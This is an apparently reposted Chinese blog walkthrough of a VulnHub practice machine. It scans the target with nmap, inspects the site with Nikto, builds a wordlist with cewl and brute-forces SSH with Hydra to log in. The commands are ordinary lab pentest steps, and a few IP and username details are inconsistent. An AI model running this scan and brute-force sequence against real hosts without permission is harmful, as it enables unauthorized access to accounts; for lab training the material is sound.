本文共 1171 字,大约阅读时间需要 3 分钟。
第一次vulnhub靶场练习
kali虚拟机IP:192.168.255.139
linux目标机:192.168.255.1411.使用kali里的nmap扫出靶机ip
nmap -sP 192.168.255.0/24
2.发现靶机IP为192.168.255.141,接下来查看开放的端口,继续使用nmap
nmap -sS -sV -Pn -v -p- 192.168.255.141 //发现靶机开启了80端口跟60022端口,这60022端口是ssh远程协议3.先用浏览器访问一波,发现上面都没有。 4.我们再来看看网站源码。 5.看见有个/rambo.html文件,我们访问一下。 只是给我们的提示,最后还是让我们爆破ssh密码。 6.我们就按照他的提示使用Nikto工具来查看此服务器默认和不安全的文件,配置和程序。
//nikto基本使用://这里我们就用默认的就好了//更新nikto工具nikto -update// 默认使用nikto -h http://192.168.255.141//指定端口,-port 或者-pnikto -h http://192.168.255.141 -p 4437.继续下一步。使用 cewl爬行网站获取关键信息创建一个密码字典。
// 直接只用下面命令cewl -w words.txt -d 1 -m 5 http://192.168.255.141/johnnyrambo/-m:最小单词长度-w:创建txt文件,文件名是words.txt-d:爬网深度-e:收集包含emali地址信息-c:每个单词出现的次数8.使用wc文件统计命令来查看words.txt字典,发现共有137条密码。
wc -l words.txt-c:统计字节数。-l:统计行数。-m:统计字符数。这个标志不能与 -c 标志一起使用。-w:统计字数。一个字被定义为由空白、跳格或换行字符分隔的字符串。-L:打印最长行的长度。-help:显示帮助信息--version:显示版本信息9.接下来就是爆破ssh密码了,这里我们用到Hydra工具进行爆破。
hydra -l johnny -P words.txt -v 192.168.86.132 ssh -s 60022 -t 4-l:指定用户名 //这里我们指定Johnny这个用户进行爆破-P:表示密码文件-v:表示详细-s:用于端口 //因为它位于非默认端口上-t:表示线程 //速度更快!10.登了5分钟之后终于爆出来了,接下来直接ssh远程连接就行了。
ssh -l johny -p 60022 192.168.255.141就这样吧 结束!
转载地址:http://qaywi.baihongyu.com/